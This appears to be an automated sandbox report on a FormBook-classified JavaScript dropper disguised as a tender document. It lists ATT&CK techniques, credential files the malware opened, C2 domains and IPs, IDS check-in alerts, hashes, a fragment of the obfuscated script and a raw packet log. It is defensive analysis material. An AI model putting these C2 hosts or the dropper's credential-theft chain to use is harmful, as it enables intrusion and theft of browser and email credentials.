          Source: Yara match | File source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\SysWOW64\ipconfig.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Source: C:\Windows\SysWOW64\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Windows\SysWOW64\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\ipconfig.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State

          Remote Access Functionality

          Source: Yara match | File source: 2.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.827578595.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.449687354.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.828442248.0000000000E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.827381163.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 42 Scripting | Path Interception | 512 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 File and Directory Discovery | Remote Services | 11 Archive Collected Data | Exfiltration Over Other Network Medium | 3 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 11 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 42 Scripting | Security Account Manager | 121 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 4 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 5 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 15 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 13 Software Packing | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Timestomp | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 File Deletion | DCSync | 1 Remote System Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Masquerading | Proc Filesystem | 1 System Network Configuration Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 31 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 512 Process Injection | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
          [Behavior graph: ID 794330; Sample: 0900664 MOHS Tender..js; Start date: 30/01/2023; Architecture: WINDOWS; Score: 100. Process chain shown: wscript.exe -> winner.exe -> CasPol.exe -> explorer.exe (injected) -> ipconfig.exe.]

          Source | Detection | Scanner | Label | Link
          0900664 MOHS Tender..js | 18% | ReversingLabs | Script-JS.Trojan.FormBook |
          0900664 MOHS Tender..js | 28% | Virustotal | | Browse

          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Temp\winner.exe | 100% | Joe Sandbox ML | |
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\winner[1].exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook |
          C:\Users\user\AppData\Local\Temp\winner.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.FormBook |

          Source | Detection | Scanner | Label | Link | Download
          2.2.CasPol.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          No Antivirus matches
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.hougou.ru/czni/evexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.versusfinances.techexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.deglaz.xyzexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.toporsche.onlineexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.panalobet88.netexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.yeah-go.comwww.yeah-go.com20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://www.deglaz.xyzwww.deglaz.xyz20=4xfPiv3RnEaYexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.417335340.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.827550131.0000000000921000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.arritalvigo.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.panalobet88.net/czni/explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.44yyds.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.toporsche.onlinewww.toporsche.online20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.lakeviewautomation.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.genuineinsights.cloudexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: phishing
                                                            unknown
                                                            http://www.genuineinsights.cloudwww.genuineinsights.cloud20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.hayethe.sitewww.hayethe.site20=4xfPiv3RnEexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            low
                                                            http://www.chimid.orgexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.yeah-go.comexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.hayethe.siteexplorer.exe, 00000003.00000003.618814793.00000000065D1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.813746553.00000000065D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.534374835.00000000065D1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 794330
Start date and time: 2023-01-30 13:37:31 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (Javascript)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample file name: 0900664 MOHS Tender..js
Detection: MAL
Classification: mal100.troj.spyw.evad.winJS@11/4@17/18
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 44.6% (good quality ratio 37.7%)
• Quality average: 65.8%
• Quality standard deviation: 35.9%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 63
• Number of non-executed functions: 19
Cookbook Comments:
• Found application associated with file extension: .js
• Override analysis time to 240s for JS/VBS files not yet terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time      Type             Description
13:39:19  API Interceptor  1x Sleep call for process: winner.exe modified
13:39:47  API Interceptor  1072x Sleep call for process: explorer.exe modified
                                                                        Process:C:\Users\user\AppData\Local\Temp\winner.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):226
                                                                        Entropy (8bit):5.3467126928258955
                                                                        Encrypted:false
                                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2LDY3U21v:Q3La/KDLI4MWuPk21v
                                                                        MD5:DD8B7A943A5D834CEEAB90A6BBBF4781
                                                                        SHA1:2BED8D47DF1C0FF76B40811E5F11298BD2D06389
                                                                        SHA-256:E1D0A304B16BE51AE361E392A678D887AB0B76630B42A12D252EDC0484F0333B
                                                                        SHA-512:24167174EA259CAF57F65B9B9B9C113DD944FC957DB444C2F66BC656EC2E6565EFE4B4354660A5BE85CE4847434B3BDD4F7E05A9E9D61F4CC99FF0284DAA1C87
                                                                        Malicious:false
                                                                        Reputation:high, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..
                                                                        Process:C:\Windows\System32\wscript.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):619008
                                                                        Entropy (8bit):7.942180801026179
                                                                        Encrypted:false
                                                                        SSDEEP:12288:Fq9i2SvYr3DzQpRqubbdC5QIF/QydtyvscBJeEZLI1kdKKbF7u3fkhJYAP:A9HzHE+mCzQydV6EF4aU
                                                                        MD5:A9C03263C6DD4A1B672955A5ECADC1FF
                                                                        SHA1:01E2477F49E9916866469E2117E77D55AA613B89
                                                                        SHA-256:FB53D9D52D8BB79D32983A428E7B7067952818CEE896209C8C08C8DE93DE7680
                                                                        SHA-512:4320605E2D21E5A972FCF922C08474653F8A76965DC29704247B83453EA753844E3DB7891E451C2EA8F9A6FD1405B96C8F79A0A95D821EF64791B584563257BA
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                        Process:C:\Windows\SysWOW64\ipconfig.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 3, database pages 45, cookie 0x3d, schema 4, UTF-8, version-valid-for 3
                                                                        Category:dropped
                                                                        Size (bytes):94208
                                                                        Entropy (8bit):1.287139506398081
                                                                        Encrypted:false
                                                                        SSDEEP:192:Qo1/8dpUXbSzTPJPF6n/YVuzdqfEwn7PrH944:QS/indc/YVuzdqfEwn7b944
                                                                        MD5:292F98D765C8712910776C89ADDE2311
                                                                        SHA1:E9F4CCB4577B3E6857C6116C9CBA0F3EC63878C5
                                                                        SHA-256:9C63F8321526F04D4CD0CFE11EA32576D1502272FE8333536B9DEE2C3B49825E
                                                                        SHA-512:205764B34543D8B53118B3AEA88C550B2273E6EBC880AAD5A106F8DB11D520EB8FD6EFD3DB3B87A4500D287187832FCF18F60556072DD7F5CC947BB7A4E3C3C1
                                                                        Malicious:false
                                                                        File type:ASCII text, with very long lines (9343), with no line terminators
                                                                        Entropy (8bit):5.467587351705753
                                                                        TrID:
                                                                          File name:0900664 MOHS Tender..js
                                                                          File size:9343
                                                                          MD5:a83afa6f04c636145ba81c1ae4fb0b09
                                                                          SHA1:a229f1ae98501e9fb00097986b3e76a910c97903
                                                                          SHA256:15232283ec281be6d000c6f5286007413363ec3fcb108642e49791a953540de1
                                                                          SHA512:b09058b7faef4a9508e14fe3068f8cc0d620d4fe4e9a2234b4f9707e5fe63f25b018de39df4e2e7fc458c7c572046f961b72f0bc416cb7eee3d8d0a1f4131d73
                                                                          SSDEEP:192:fXSWtooXv9eMcrwMJZoJUSFwI8zp1U7Yx2ip43VUxaL9AHACh3bALnzOFKaT:PSWaSv95KRJZoJUZtiXSRDh3UyFPT
                                                                          TLSH:B512A75866D428D4175B8BDA2327B5C9D85E48A77E854C0BF200FC842996B33CEE6F72
                                                                          File Content Preview:function _0x33f1(){var _0x237372=['jjEhYu','WOGynK1UEIHeaCoZd8ogza','3rnQ','tCk1WPiAW7/dOb3dQG','MSXML2.XMLHTTP','ASkCW6DM','WQpdJaNdUSkw','3080NCsyfc','E0RdL8o3lfldQcTd','cz*B','W5ZdI13cMmk4B2fiW4xdTW','bmo7FSkWWRb9cuhdOSk3','pAZheY','length','h0H+WOxcJb
                                                                          Icon Hash:e8d69ece968a9ec4
Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
01/30/23-13:39:50.282718  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49707        80         192.168.2.5  14.128.47.126
01/30/23-13:42:32.091612  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49743        80         192.168.2.5  14.128.47.126
01/30/23-13:39:50.282718  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49707        80         192.168.2.5  14.128.47.126
01/30/23-13:40:11.394536  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49712        80         192.168.2.5  208.91.197.91
01/30/23-13:42:32.091612  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49743        80         192.168.2.5  14.128.47.126
01/30/23-13:40:51.433517  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49720        80         192.168.2.5  23.227.38.74
01/30/23-13:41:08.676759  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.5  199.192.28.121
01/30/23-13:39:50.282718  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49707        80         192.168.2.5  14.128.47.126
01/30/23-13:40:51.433517  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49720        80         192.168.2.5  23.227.38.74
01/30/23-13:41:08.676759  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.5  199.192.28.121
01/30/23-13:42:25.723154  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49742        80         192.168.2.5  87.236.16.153
01/30/23-13:40:51.433517  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49720        80         192.168.2.5  23.227.38.74
01/30/23-13:41:08.676759  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49724        80         192.168.2.5  199.192.28.121
01/30/23-13:42:32.091612  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49743        80         192.168.2.5  14.128.47.126
01/30/23-13:40:11.394536  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49712        80         192.168.2.5  208.91.197.91
01/30/23-13:40:21.675069  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49715        80         192.168.2.5  66.96.162.149
01/30/23-13:42:25.723154  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49742        80         192.168.2.5  87.236.16.153
01/30/23-13:40:21.675069  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49715        80         192.168.2.5  66.96.162.149
01/30/23-13:40:11.394536  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49712        80         192.168.2.5  208.91.197.91
01/30/23-13:40:21.675069  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49715        80         192.168.2.5  66.96.162.149
01/30/23-13:42:25.723154  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49742        80         192.168.2.5  87.236.16.153
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                          Jan 30, 2023 13:39:17.277477980 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277493000 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277513027 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.277570963 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.277602911 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346103907 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346205950 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346267939 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346277952 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346308947 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346335888 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346349001 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346375942 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346385002 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346409082 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346429110 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346458912 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346467972 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346482038 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346497059 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346510887 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346518993 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346549034 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346553087 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346579075 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346585989 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346609116 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346637011 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346648932 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346661091 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346714973 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346741915 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346802950 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346815109 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346843004 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346875906 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346884966 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346900940 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346926928 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346954107 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.346966028 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.346976995 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347027063 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347033024 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347044945 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347089052 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347111940 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347119093 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347131014 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347172976 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347197056 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347278118 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347280025 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347291946 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347342968 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347357035 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347369909 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347398043 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347399950 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347429991 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347440958 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347455978 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347465038 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347502947 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347508907 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347522020 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347527981 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347548008 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347574949 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347606897 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347672939 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347685099 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347723007 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347754002 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347763062 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347774029 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347822905 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347847939 CET4434970391.227.138.48192.168.2.5
                                                                          Jan 30, 2023 13:39:17.347863913 CET49703443192.168.2.591.227.138.48
                                                                          Jan 30, 2023 13:39:17.347873926 CET4434970391.227.138.48192.168.2.5
